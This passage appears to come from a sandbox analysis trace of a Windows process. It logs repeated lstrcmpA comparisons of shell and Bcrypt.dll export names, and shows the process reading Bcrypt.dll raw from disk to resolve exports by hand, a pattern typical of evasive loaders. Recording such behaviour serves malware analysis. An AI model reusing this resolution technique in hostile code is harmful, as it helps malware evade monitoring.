lpString2="CreateStorageItemFromPath_FullTrustCaller_ForPackage") returned 1 [0092.751] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="CreateStorageItemFromPath_PartialTrustCaller") returned 1 [0092.751] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="CreateStorageItemFromShellItem_FullTrustCaller") returned 1 [0092.751] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage") returned 0 [0092.751] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="AppCompat_RunDLLW") returned 1 [0092.751] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="AssocCreateForClasses") returned 1 [0092.751] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="AssocGetDetailsOfPropKey") returned 1 [0092.751] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="CDefFolderMenu_Create2") returned 1 [0092.751] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="CIDLData_CreateFromIDArray") returned 1 [0092.751] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0092.751] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="CheckEscapesW") returned 1 [0092.752] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="CommandLineToArgvW") returned 1 [0092.752] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="Control_RunDLL") returned 1 [0092.752] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="Control_RunDLLA") returned 1 [0092.752] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="Control_RunDLLAsUserW") returned 1 [0092.752] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="Control_RunDLLW") returned 1 [0092.752] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="CreateStorageItemFromPath_FullTrustCaller") returned 1 [0092.752] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="CreateStorageItemFromPath_FullTrustCaller_ForPackage") returned 1 [0092.752] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="CreateStorageItemFromPath_PartialTrustCaller") returned 1 [0092.752] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="CreateStorageItemFromShellItem_FullTrustCaller") returned 1 [0092.752] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage") returned 1 [0092.752] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle") returned 0 [0092.752] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="AppCompat_RunDLLW") returned 1 [0092.752] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="AssocCreateForClasses") returned 1 [0092.752] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="AssocGetDetailsOfPropKey") returned 1 [0092.752] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CDefFolderMenu_Create2") returned 1 [0092.752] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CIDLData_CreateFromIDArray") returned 1 [0092.752] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0092.753] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CheckEscapesW") returned 1 [0092.753] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CommandLineToArgvW") returned 1 [0092.753] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="Control_RunDLL") returned 1 [0092.753] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="Control_RunDLLA") returned 1 [0092.753] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="Control_RunDLLAsUserW") returned 1 [0092.753] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="Control_RunDLLW") returned 1 [0092.753] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CreateStorageItemFromPath_FullTrustCaller") returned 1 [0092.753] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CreateStorageItemFromPath_FullTrustCaller_ForPackage") returned 1 [0092.753] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CreateStorageItemFromPath_PartialTrustCaller") returned 1 [0092.753] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CreateStorageItemFromShellItem_FullTrustCaller") returned 1 [0092.753] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage") returned 1 [0092.753] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle") returned 1 [0092.753] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage") returned 0 [0092.753] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="AppCompat_RunDLLW") returned 1 [0092.753] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="AssocCreateForClasses") returned 1 [0092.753] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="AssocGetDetailsOfPropKey") returned 1 [0092.753] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CDefFolderMenu_Create2") returned 1 [0092.753] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CIDLData_CreateFromIDArray") returned 1 [0092.754] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CStorageItem_GetValidatedStorageItemObject") returned 1 [0092.754] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CheckEscapesW") returned 1 [0092.754] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CommandLineToArgvW") returned 1 [0092.754] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="Control_RunDLL") returned 1 [0092.754] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="Control_RunDLLA") returned 1 [0092.754] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="Control_RunDLLAsUserW") returned 1 [0092.754] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="Control_RunDLLW") returned 1 [0092.754] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CreateStorageItemFromPath_FullTrustCaller") returned 1 [0092.754] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CreateStorageItemFromPath_FullTrustCaller_ForPackage") returned 1 [0092.754] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CreateStorageItemFromPath_PartialTrustCaller") returned 1 [0092.754] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CreateStorageItemFromShellItem_FullTrustCaller") returned 1 [0092.754] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage") returned 1 [0092.754] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle") returned 1 [0092.754] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage") returned 1 [0092.754] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="DAD_AutoScroll") returned 0 [0092.754] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="AppCompat_RunDLLW") returned 1 [0092.754] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="AssocCreateForClasses") returned 1 [0092.754] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="AssocGetDetailsOfPropKey") returned 1 [0092.755] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CDefFolderMenu_Create2") returned 1 [0092.755] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CIDLData_CreateFromIDArray") returned 1 [0092.755] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CStorageItem_GetValidatedStorageItemObject") returned 1 [0092.755] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CheckEscapesW") returned 1 [0092.755] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CommandLineToArgvW") returned 1 [0092.755] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="Control_RunDLL") returned 1 [0092.755] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="Control_RunDLLA") returned 1 [0092.755] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="Control_RunDLLAsUserW") returned 1 [0092.755] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="Control_RunDLLW") returned 1 [0092.755] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CreateStorageItemFromPath_FullTrustCaller") returned 1 [0092.755] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CreateStorageItemFromPath_FullTrustCaller_ForPackage") returned 1 [0092.755] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CreateStorageItemFromPath_PartialTrustCaller") returned 1 [0092.755] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CreateStorageItemFromShellItem_FullTrustCaller") returned 1 [0092.755] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage") returned 1 [0092.755] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle") returned 1 [0092.755] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage") returned 1 [0092.755] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="DAD_AutoScroll") returned 1 [0092.756] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="DAD_DragEnterEx") returned 0 [0092.756] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="AppCompat_RunDLLW") returned 1 [0092.756] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="AssocCreateForClasses") returned 1 [0092.756] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="AssocGetDetailsOfPropKey") returned 1 [0092.756] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="CDefFolderMenu_Create2") returned 1 [0092.756] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="CIDLData_CreateFromIDArray") returned 1 [0092.756] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="CStorageItem_GetValidatedStorageItemObject") returned 1 [0092.756] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="CheckEscapesW") returned 1 [0092.756] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="CommandLineToArgvW") returned 1 [0092.756] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="Control_RunDLL") returned 1 [0092.756] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="Control_RunDLLA") returned 1 [0092.756] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="Control_RunDLLAsUserW") returned 1 [0092.756] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="Control_RunDLLW") returned 1 [0092.756] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="CreateStorageItemFromPath_FullTrustCaller") returned 1 [0092.756] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="CreateStorageItemFromPath_FullTrustCaller_ForPackage") returned 1 [0092.756] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="CreateStorageItemFromPath_PartialTrustCaller") returned 1 [0092.756] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="CreateStorageItemFromShellItem_FullTrustCaller") returned 1 [0092.756] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage") returned 1 [0092.756] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle") returned 1 [0093.189] GetProcessHeap () returned 0x570000 [0093.189] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x417a040 | out: hHeap=0x570000) returned 1 [0093.958] GetProcessHeap () returned 0x570000 [0093.958] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x10) returned 0x589180 [0093.958] LoadLibraryA (lpLibFileName="Bcrypt.dll") returned 0x7ffc5bcc0000 [0093.965] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0093.965] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0093.965] GetModuleFileNameA (in: hModule=0x7ffc5bcc0000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\SYSTEM32\\Bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll")) returned 0x1e [0093.965] CreateFileA (lpFileName="C:\\Windows\\SYSTEM32\\Bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0093.965] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0093.966] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0093.966] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=159648) returned 1 [0093.966] GetProcessHeap () returned 0x570000 [0093.966] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x26fa0) returned 0x2db2010 [0093.968] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0093.968] ReadFile (in: hFile=0x15c, lpBuffer=0x2db2010, nNumberOfBytesToRead=0x26fa0, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x2db2010*, lpNumberOfBytesRead=0x14f5a4*=0x26fa0, lpOverlapped=0x0) returned 1 [0093.971] CloseHandle (hObject=0x15c) returned 1 [0093.972] lstrcmpA (lpString1="BCryptAddContextFunction", lpString2="BCryptAddContextFunction") returned 0 [0093.972] lstrcmpA (lpString1="BCryptAddContextFunctionProvider", lpString2="BCryptAddContextFunction") returned 1 [0093.972] lstrcmpA (lpString1="BCryptAddContextFunctionProvider", lpString2="BCryptAddContextFunctionProvider") returned 0 [0093.972] lstrcmpA (lpString1="BCryptCloseAlgorithmProvider", lpString2="BCryptAddContextFunction") returned 1 [0093.972] lstrcmpA (lpString1="BCryptCloseAlgorithmProvider", lpString2="BCryptAddContextFunctionProvider") returned 1 [0093.972] lstrcmpA (lpString1="BCryptCloseAlgorithmProvider", lpString2="BCryptCloseAlgorithmProvider") returned 0 [0093.972] lstrcmpA (lpString1="BCryptConfigureContext", lpString2="BCryptAddContextFunction") returned 1 [0093.972] lstrcmpA (lpString1="BCryptConfigureContext", lpString2="BCryptAddContextFunctionProvider") returned 1 [0093.972] lstrcmpA (lpString1="BCryptConfigureContext", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0093.972] lstrcmpA (lpString1="BCryptConfigureContext", lpString2="BCryptConfigureContext") returned 0 [0093.972] lstrcmpA (lpString1="BCryptConfigureContextFunction", lpString2="BCryptAddContextFunction") returned 1 [0093.972] lstrcmpA (lpString1="BCryptConfigureContextFunction", lpString2="BCryptAddContextFunctionProvider") returned 1 [0093.972] lstrcmpA (lpString1="BCryptConfigureContextFunction", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0093.972] lstrcmpA (lpString1="BCryptConfigureContextFunction", lpString2="BCryptConfigureContext") returned 1 [0093.972] lstrcmpA (lpString1="BCryptConfigureContextFunction", lpString2="BCryptConfigureContextFunction") returned 0 [0093.972] lstrcmpA (lpString1="BCryptCreateContext", lpString2="BCryptAddContextFunction") returned 1 [0093.972] lstrcmpA (lpString1="BCryptCreateContext", lpString2="BCryptAddContextFunctionProvider") returned 1 [0093.972] lstrcmpA (lpString1="BCryptCreateContext", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0093.972] lstrcmpA (lpString1="BCryptCreateContext", lpString2="BCryptConfigureContext") returned 1 [0093.973] lstrcmpA (lpString1="BCryptCreateContext", lpString2="BCryptConfigureContextFunction") returned 1 [0093.973] lstrcmpA (lpString1="BCryptCreateContext", lpString2="BCryptCreateContext") returned 0 [0093.973] lstrcmpA (lpString1="BCryptCreateHash", lpString2="BCryptAddContextFunction") returned 1 [0093.973] lstrcmpA (lpString1="BCryptCreateHash", lpString2="BCryptAddContextFunctionProvider") returned 1 [0093.973] lstrcmpA (lpString1="BCryptCreateHash", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0093.973] lstrcmpA (lpString1="BCryptCreateHash", lpString2="BCryptConfigureContext") returned 1 [0093.973] lstrcmpA (lpString1="BCryptCreateHash", lpString2="BCryptConfigureContextFunction") returned 1 [0093.973] lstrcmpA (lpString1="BCryptCreateHash", lpString2="BCryptCreateContext") returned 1 [0093.973] lstrcmpA (lpString1="BCryptCreateHash", lpString2="BCryptCreateHash") returned 0 [0093.973] lstrcmpA (lpString1="BCryptCreateMultiHash", lpString2="BCryptAddContextFunction") returned 1 [0093.973] lstrcmpA (lpString1="BCryptCreateMultiHash", lpString2="BCryptAddContextFunctionProvider") returned 1 [0093.973] lstrcmpA (lpString1="BCryptCreateMultiHash", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0093.973] lstrcmpA (lpString1="BCryptCreateMultiHash", lpString2="BCryptConfigureContext") returned 1 [0093.973] lstrcmpA (lpString1="BCryptCreateMultiHash", lpString2="BCryptConfigureContextFunction") returned 1 [0093.973] lstrcmpA (lpString1="BCryptCreateMultiHash", lpString2="BCryptCreateContext") returned 1 [0093.973] lstrcmpA (lpString1="BCryptCreateMultiHash", lpString2="BCryptCreateHash") returned 1 [0093.973] lstrcmpA (lpString1="BCryptCreateMultiHash", lpString2="BCryptCreateMultiHash") returned 0 [0093.973] lstrcmpA (lpString1="BCryptDecrypt", lpString2="BCryptAddContextFunction") returned 1 [0093.973] lstrcmpA (lpString1="BCryptDecrypt", lpString2="BCryptAddContextFunctionProvider") returned 1 [0093.973] lstrcmpA (lpString1="BCryptDecrypt", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0093.973] lstrcmpA (lpString1="BCryptDecrypt", lpString2="BCryptConfigureContext") returned 1 [0093.974] lstrcmpA (lpString1="BCryptDecrypt", lpString2="BCryptConfigureContextFunction") returned 1 [0093.974] lstrcmpA (lpString1="BCryptDecrypt", lpString2="BCryptCreateContext") returned 1 [0093.974] lstrcmpA (lpString1="BCryptDecrypt", lpString2="BCryptCreateHash") returned 1 [0093.974] lstrcmpA (lpString1="BCryptDecrypt", lpString2="BCryptCreateMultiHash") returned 1 [0093.974] lstrcmpA (lpString1="BCryptDecrypt", lpString2="BCryptDecrypt") returned 0 [0093.974] lstrcmpA (lpString1="BCryptDeleteContext", lpString2="BCryptAddContextFunction") returned 1 [0093.974] lstrcmpA (lpString1="BCryptDeleteContext", lpString2="BCryptAddContextFunctionProvider") returned 1 [0093.974] lstrcmpA (lpString1="BCryptDeleteContext", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0093.974] lstrcmpA (lpString1="BCryptDeleteContext", lpString2="BCryptConfigureContext") returned 1 [0093.974] lstrcmpA (lpString1="BCryptDeleteContext", lpString2="BCryptConfigureContextFunction") returned 1 [0093.974] lstrcmpA (lpString1="BCryptDeleteContext", lpString2="BCryptCreateContext") returned 1 [0093.974] lstrcmpA (lpString1="BCryptDeleteContext", lpString2="BCryptCreateHash") returned 1 [0093.974] lstrcmpA (lpString1="BCryptDeleteContext", lpString2="BCryptCreateMultiHash") returned 1 [0093.974] lstrcmpA (lpString1="BCryptDeleteContext", lpString2="BCryptDecrypt") returned 1 [0093.974] lstrcmpA (lpString1="BCryptDeleteContext", lpString2="BCryptDeleteContext") returned 0 [0093.974] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptAddContextFunction") returned 1 [0093.974] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptAddContextFunctionProvider") returned 1 [0093.974] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0093.974] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptConfigureContext") returned 1 [0093.974] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptConfigureContextFunction") returned 1 [0093.974] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptCreateContext") returned 1 [0093.974] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptCreateHash") returned 1 [0093.974] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptCreateMultiHash") returned 1 [0093.974] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptDecrypt") returned 1 [0093.974] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptDeleteContext") returned 1 [0093.975] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptDeriveKey") returned 0 [0093.975] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptAddContextFunction") returned 1 [0093.975] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptAddContextFunctionProvider") returned 1 [0093.975] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0093.975] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptConfigureContext") returned 1 [0093.975] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptConfigureContextFunction") returned 1 [0093.975] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptCreateContext") returned 1 [0093.975] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptCreateHash") returned 1 [0093.975] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptCreateMultiHash") returned 1 [0093.975] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptDecrypt") returned 1 [0093.975] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptDeleteContext") returned 1 [0093.975] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptDeriveKey") returned 1 [0093.975] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptDeriveKeyCapi") returned 0 [0093.975] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptAddContextFunction") returned 1 [0093.975] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptAddContextFunctionProvider") returned 1 [0093.975] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0093.975] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptConfigureContext") returned 1 [0093.975] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptConfigureContextFunction") returned 1 [0093.975] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptCreateContext") returned 1 [0093.975] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptCreateHash") returned 1 [0093.975] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptCreateMultiHash") returned 1 [0093.975] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptDecrypt") returned 1 [0093.975] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptDeleteContext") returned 1 [0093.975] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptDeriveKey") returned 1 [0093.975] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptDeriveKeyCapi") returned 1 [0093.975] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptDeriveKeyPBKDF2") returned 0 [0093.976] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptAddContextFunction") returned 1 [0093.976] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptAddContextFunctionProvider") returned 1 [0093.976] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0093.976] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptConfigureContext") returned 1 [0093.976] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptConfigureContextFunction") returned 1 [0093.976] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptCreateContext") returned 1 [0093.976] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptCreateHash") returned 1 [0093.976] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptCreateMultiHash") returned 1 [0093.976] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptDecrypt") returned 1 [0093.976] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptDeleteContext") returned 1 [0093.976] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptDeriveKey") returned 1 [0093.976] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptDeriveKeyCapi") returned 1 [0093.976] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptDeriveKeyPBKDF2") returned 1 [0093.976] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptDestroyHash") returned 0 [0093.976] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptAddContextFunction") returned 1 [0093.976] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptAddContextFunctionProvider") returned 1 [0093.976] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0093.976] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptConfigureContext") returned 1 [0093.976] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptConfigureContextFunction") returned 1 [0093.976] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptCreateContext") returned 1 [0093.976] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptCreateHash") returned 1 [0093.976] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptCreateMultiHash") returned 1 [0093.976] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptDecrypt") returned 1 [0093.976] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptDeleteContext") returned 1 [0093.976] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptDeriveKey") returned 1 [0093.976] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptDeriveKeyCapi") returned 1 [0093.977] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptDeriveKeyPBKDF2") returned 1 [0093.977] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptDestroyHash") returned 1 [0093.977] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptDestroyKey") returned 0 [0093.977] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptAddContextFunction") returned 1 [0093.977] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptAddContextFunctionProvider") returned 1 [0093.977] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0093.977] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptConfigureContext") returned 1 [0093.977] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptConfigureContextFunction") returned 1 [0093.977] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptCreateContext") returned 1 [0093.977] 